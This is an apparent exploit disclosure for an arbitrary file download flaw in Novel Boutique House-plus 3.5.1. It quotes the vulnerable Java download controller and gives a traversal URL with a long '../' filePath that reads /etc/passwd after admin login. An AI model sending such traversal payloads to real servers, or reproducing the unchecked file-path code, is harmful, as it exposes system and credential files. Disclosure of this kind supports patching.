Novel Boutique House-plus 3.5.1 Arbitrary File Download

2021.03.29
Credit: tuyiqiang
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

# Exploit Title: Novel Boutique House-plus 3.5.1 - Arbitrary File Download # Date: 27/03/2021 # Exploit Author: tuyiqiang # Vendor Homepage: https://xiongxyang.gitee.io/ # Software Link: https://gitee.com/novel_dev_team/novel-plus,https://github.com/201206030/novel-plus # Version: all # Tested on: linux Vulnerable code: com/java2nb/common/controller/FileController.java @RequestMapping(value = "/download") public void fileDownload(String filePath,String fileName, HttpServletResponse resp) throws Exception { String realFilePath = jnConfig.getUploadPath() + filePath; InputStream in = new FileInputStream(realFilePath); fileName = URLEncoder.encode(fileName, "UTF-8"); resp.setHeader("Content-Disposition", "attachment;filename=" + fileName); resp.setContentLength(in.available()); OutputStream out = resp.getOutputStream(); byte[] b = new byte[1024]; int len = 0; while ((len = in.read(b)) != -1) { out.write(b, 0, len); } out.flush(); out.close(); in.close(); } Guide: 1. Log in to background management 2. http://xxxx/common/sysFile/download?filePath=../../../../../../../../../../../../../../../../../etc/passwd&fileName=passwd


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top